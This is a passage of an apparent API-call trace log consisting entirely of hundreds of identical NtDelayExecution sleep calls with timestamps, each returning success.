(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.483] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.485] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.489] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.497] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.498] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.501] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.503] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.506] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.510] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.511] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.513] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.514] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.516] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.518] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.522] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.523] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.524] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.526] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.527] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.531] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.533] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.535] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.538] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.543] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.547] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.549] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.552] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.555] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.556] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.558] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.559] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.561] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.571] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.575] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.577] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.578] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.580] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.582] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.583] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.585] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.586] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.588] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.593] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.594] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.596] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.599] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.602] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.604] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.605] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.607] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.609] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.610] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.612] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.614] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.615] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.617] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.618] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.620] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.621] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.625] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.627] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.628] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.630] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.631] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.633] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.636] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.637] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.639] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.640] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.642] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.645] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.646] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.653] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.656] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.658] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.660] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.661] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.663] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.665] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.666] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.668] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.669] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.671] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.672] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.674] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.677] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.702] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.706] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.707] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.708] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.710] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.711] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.714] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.715] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.717] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.718] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.720] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.722] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.724] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.725] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.727] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.728] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.731] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.735] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.736] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.738] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.741] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.742] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.744] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.745] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.748] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.749] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.750] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.753] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.755] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.757] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.758] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.760] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.761] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.765] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.766] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.768] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.769] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.771] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.772] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.774] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.775] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.777] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.778] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.781] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.782] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.783] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.785] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.787] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.788] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.790] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.791] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.796] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.797] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.799] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.801] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.803] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.804] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.806] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.807] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.809] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.810] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.812] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.813] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.815] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.817] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.819] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.820] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.822] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.823] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.829] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.830] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.832] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.834] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.835] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.837] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.840] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.841] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.842] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.844] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.845] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.847] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.848] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.850] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.851] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.854] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.855] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.857] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.861] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.864] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.865] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.867] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.869] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.870] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.872] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.873] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.876] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.878] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.879] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.881] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.882] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.884] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.885] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.887] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.888] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.890] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.892] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.897] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.899] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.900] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.905] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.906] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.907] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.909] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.910] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.912] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.914] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.915] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.917] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.918] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.920] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.921] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.923] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.924] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.926] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.931] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.932] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.934] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.935] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.938] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.939] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.942] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.943] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.945] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.946] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.949] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.951] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.952] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.954] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.955] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.957] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.958] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.960] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.961] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.967] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.968] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.970] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.971] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.973] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.975] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.976] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.978] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.981] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.982] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.983] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.985] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.986] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.988] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.989] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.991] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.992] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.994] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.995] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.997] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0127.998] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.005] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.007] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.008] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.010] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.011] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.014] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.015] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.017] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.018] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.020] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.022] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.024] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.025] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.027] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.028] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.030] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.031] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.033] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.034] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.037] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.044] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.045] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.047] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.048] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.051] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.053] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.054] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.057] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.059] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.061] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.062] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.064] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.065] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.067] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.068] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.070] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.071] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.074] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.075] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.082] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.083] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.084] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.086] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.087] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.090] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.092] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.093] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.095] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.096] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.098] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.100] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.101] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.102] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.105] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.107] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.110] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0128.111] NtDelayExecution 